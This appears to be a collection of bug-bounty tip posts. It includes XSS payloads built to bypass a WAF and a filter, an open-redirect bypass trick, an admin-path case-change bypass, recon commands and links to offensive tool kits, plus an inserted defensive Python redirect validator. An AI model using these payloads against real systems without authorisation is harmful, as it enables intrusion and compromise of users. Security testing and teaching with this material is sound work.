Imperva WAF Bypass for XSS;
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
- without parentheses, 'alert', 'document.domain', 'window', space
#BugBounty #BugBountyTip #WAF #infosec
Server Side Request Forgery via HTML injection in PDF download
https://blog.appsecco.com/server-side-request-forgery-via-html-injection-in-pdf-download-90ee4053e911
OTP Bypass on India’s Biggest Video Sharing Site
https://link.medium.com/dkdKvYCSC5
Exploiting an SSRF: Trials and Tribulations by @abugzlife1
https://link.medium.com/eUqLk4Bzu5
#bugbounty #bugbountytips
Medium
Journey of a security bug — From a naive-looking PDF Download to SSRF via HTML Injection in AWS
A post about how I approached a novel security issue and now I feel I achieved an important milestone in my journey as a pentester.
Grep hostnames from ssl certificate
echo | openssl s_client -connect example.com:443 2>/dev/null | openssl x509 -noout -text | grep DNS
#infosec #pentest #bugbounty
ffuf on Steroids
https://t.co/wwMbul2AXh
Scanning JS Files for Endpoints and Secrets
https://t.co/eN5UAj2JbO by @dark_warlord14
Path confusion
https://t.co/wcKROUlNmP
Six years of the GitHub Security Bug Bounty program
https://t.co/Ptm95lnCDq
#bugbounty,#bugbountytips
SecurityJunky.com
Scanning JS Files for Endpoints and Secrets » SecurityJunky.com
Scanning JavaScript files for Endpoints and Secrets to increase attack surface for Recon and Bug Bounty.
Open Redirect Bypass
?redirect=https://test.target.com > accepts any subdomain of target to redirect
?redirect=https://google.comğ.target.com > "Ğ" is a Turkish character, server can't render it and changes it to "?"
So it redirects to http://google.com/?target.com
#bugbounty #bugbountytip
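A defender's view of the redirect tip above, as an added example that is not part of the original post: the allow-list check passes on the raw parameter, but a later lossy encoding step changes the host. The Latin-1 writer, the `FALLBACK` path and all function names are assumptions made for illustration.

```python
from urllib.parse import urlsplit

ALLOWED_SUFFIX = ".target.com"  # placeholder domain used in the tip
FALLBACK = "/"                  # assumption: a safe local landing page
# Constructed input from the tip: U+011F sits between the two host names.
CONSTRUCTED_INPUT = "https://google.com\u011f.target.com"

def naive_check(url: str) -> bool:
    """Flawed: validates the raw parameter, not the string finally sent."""
    host = urlsplit(url).hostname or ""
    return host.endswith(ALLOWED_SUFFIX)

def emitted_location(url: str) -> str:
    """Model of the lossy step: a legacy-charset writer that substitutes '?'
    for characters it cannot encode (assumed to be Latin-1 here)."""
    return url.encode("latin-1", errors="replace").decode("latin-1")

def final_host(url: str) -> str:
    """Host a browser would actually visit after the lossy step."""
    return urlsplit(emitted_location(url)).hostname or ""

def safe_redirect_target(url: str) -> str:
    """Accept only a URL that is already in its final, ASCII form."""
    try:
        url.encode("ascii")  # reject rather than substitute
        parts = urlsplit(url)
        host = parts.hostname or ""
    except ValueError:       # UnicodeEncodeError is a ValueError subclass
        return FALLBACK
    if any(c in url for c in "\\\r\n\t "):  # characters parsers disagree on
        return FALLBACK
    if parts.scheme != "https" or parts.username or parts.password:
        return FALLBACK
    if host != ALLOWED_SUFFIX[1:] and not host.endswith(ALLOWED_SUFFIX):
        return FALLBACK
    return url

if __name__ == "__main__":
    print(naive_check(CONSTRUCTED_INPUT), final_host(CONSTRUCTED_INPUT))
    print(safe_redirect_target(CONSTRUCTED_INPUT))
    print(safe_redirect_target("https://test.target.com/home"))
```

The point of the hardened version is ordering: validation runs on the exact bytes that will be sent, and anything that would need substitution is refused instead of repaired.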
#Sqli #bugbounty
https://t.co/Rg4aZzXGCl
https://t.co/E8pzuztGrs
https://t.co/33rsA6UdcY
https://t.co/cX7uDnrTbw
https://t.co/K5ozYnr9SR
https://t.co/VJrQvjcFq4
https://t.co/qjq65XcPID
https://t.co/cmu9ItaGbp
https://t.co/ynGJv2SRyh
#bugbountytips
Yappare
Tricky Oracle SQL Injection Situation
Recently I learnt a few new things when solving SQL Injection found during pentest and also bugbounty. One of the new techniques that seems new...
[XSS] #BugBountyTips
Found a weird XSS filter bypass using this payload:
<style/><img src="z'z</style><script/z>alert(1)</script>">
#BugBounty @XssPayloads
#Pentest #bugbounty
https://github.com/k8gege/K8tools
https://github.com/mbechler/marshalsec
https://github.com/lanjelot/patator
https://github.com/coreb1t/awesome-pentest-cheat-sheets
https://github.com/evilcos/xssor2
https://github.com/cujanovic/SSRF-Testing
https://github.com/LandGrey/pydictor
https://github.com/m0rtem/CloudFail
https://github.com/1N3/Findsploit
https://github.com/rewardone/OSCPRepo
#bugbountytips
GitHub
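GitHub - k8gege/K8tools: K8 tool collection (intranet penetration/privilege escalation tools/remote overflow/vulnerability exploitation/scanning tools/password cracking/AV-evasion tools/Exploit/APT/0day/Shellcode/Payload/privilege/BypassUAC/Ove…
K8 tool collection (intranet penetration/privilege escalation tools/remote overflow/vulnerability exploitation/scanning tools/password cracking/AV-evasion tools/Exploit/APT/0day/Shellcode/Payload/privilege/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetN...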
#bugbounty Tools
Scanners-Box
https://t.co/Kl8KyFqCtl
K8tools
https://t.co/Vc9Nm6AhLt
arachni
https://t.co/jyhK1yNlkH
Osmedeus
https://t.co/4maQSFojzs
Findsploit
https://t.co/kgO1lJfwRK
StaCoAn
https://t.co/er4opW1l5J
#bugbountytips
GitHub
We5ter/Scanners-Box
A powerful hacker toolkit collected more than 10 categories of open source scanners from Github - a collection of open source scanners developed by security industry practitioners - We5ter/Scanners-Box
Tip of the day ...
http://sub.target.com/web/admin/ => 302 redirect to main domain
http://sub.target.com/web/aDmiN/ =>200 ok admin login page
http://sub.target.com/web/aDmiN/FUZZ =>$Critical sensitive files$
#bugbountytip #bugbountytips #Bugbounty